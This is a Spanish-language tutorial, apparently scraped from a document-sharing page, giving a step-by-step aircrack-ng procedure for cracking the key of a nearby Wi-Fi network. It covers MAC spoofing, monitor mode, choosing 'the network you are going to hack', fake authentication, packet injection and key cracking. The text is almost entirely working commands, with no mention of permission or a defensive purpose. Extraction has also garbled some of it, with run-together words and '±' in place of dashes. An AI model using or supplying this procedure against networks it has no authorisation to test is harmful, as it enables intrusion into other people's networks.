You are on page 1of 1

COMANDOS PARA BACKTRACK [AIRCRACK]

airmon-ng
// Indica que tipo de tarjeta tienes (mon0, wlan0, etc)
airmon-ng stop wlan0
// Desactiva el modo monitor de la tarjeta (NO-Promiscuo)wlan0-->Tipo de la tarjeta que estas utilizando.
ifconfig wlan0 down macchanger ±-mac 00:11:22:33:44:55 wlan0
//Cambia la mac de tu tarjeta.
airmon-ngstart wlan0
//Habilita el modo monitor en la tarjeta (Modo Promiscuo)MODE MONITOR ENABLED ON
mon0 (utilizar este tipo de tarjeta deahora en adelante o el modo que a ud. le aparezca)

airodump-ng mon0
//Monitoreo de redes wifi cercanas. Mientras PWR es más cercano a0 más cerca está la red. Se recomienda
desde un -75 hasta 0.//Termine de escanear redes con CTRL+C//Seleccione la red que va a hackear y copie el
BSSID de la red encuestión. Además memorice el Canal de la red
CH
.
airodump-ng ±c[canal] ±w[nombre_del_archivo] ±bssid [bssid_que_copiamos] mon0
//[] Los paréntesis de corchetes no se escriben//-w = nombre del archivo donde se capturaran los
paquetesEjemplo: -w claveEl número que nos interesa que aumente se llama
DATA
. Este nos indica la cantidad depaquetes que se han capturado. Una cantidad aceptable es 10.000 hacia arriba.
Aunquehay veces que para descifrar la clave se necesitan 40.000 o más.Como verán el número puede que
avance de forma extremadamente lenta y tardaríamosquizás días en saber la contraseña.
SOLUCION: INYECCION DE PAQUETES.- (EN OTRA VENTANA SHELL)
Para inyectar paquetes introducimos los siguientes comandos:
¬AUTENTIFICACION FALSA DENTRO DE LA REDaireplay-ng -10 ±a [bssid_que_copiamos] ±h
00:11:22:33:44:55 ±e[nombre_de_la_red] mon0
//[] Los paréntesis de corchetes no se escriben//-e = nombre de la red Ejemplo: seba, sebaGAY, etc«Para que la
autentificación falsa este correcta debe decir algo como esto.
Associationsuccefull :-)
// Tal cual, hasta con la carita feliz.En caso que no se conecte, indicara que la señal puede ser muy baja o se
hayaprotegido de alguna manera de este tipo de ataques.Si no se conecta será imposible inyectar paquetes. **Al
menos de esta forma**Luego de conectarse existen dos maneras de inyectar paquetes. Menciono que la
primeraes la que mejor me ha resultado para mí.
FORMA1aireplay-ng -2 ±p 0841 ±c ff:ff:ff:ff:ff:ff ±h 00:11:22:33:44:55 mon0
//El comando comenzara a leer paquetes luego que terminepresione
Y
y luego
ENTER.
A continuación visualizaremos como la cifra de
DATA
comienza a aumentar rápidamente,esperemos que llegue a 20.000 para estar seguros.
FORMA2

aireplay-ng -3 ±b [bssid_que_copiamos] ±h 00:11:22:33:44:55 mon0


//El comando comenzara a capturar paquetes enseguida.
DESCIFRANDO LA CLAVE
Una vez que hayamos capturado los paquetes necesarios podremos descifrar la clave.
aircrack-ng clave-01.cap
//clave=nombre en donde capturamos -01.cap= por defaultsi volvemos a capturar con el mismo nombre sin
reiniciar elpc debemos poner clave-02.cap y así sucesivamente.Comenzará a descifrar la clave. Si los paquetes
no fueron suficientes indicara algocomo
TRY next 40.000 Ivs
. Esto quiere decir que debes esperar que se capturen 40.000paquetes para el próximo intento de descifrado. Solo
tienes que esperar...

You might also like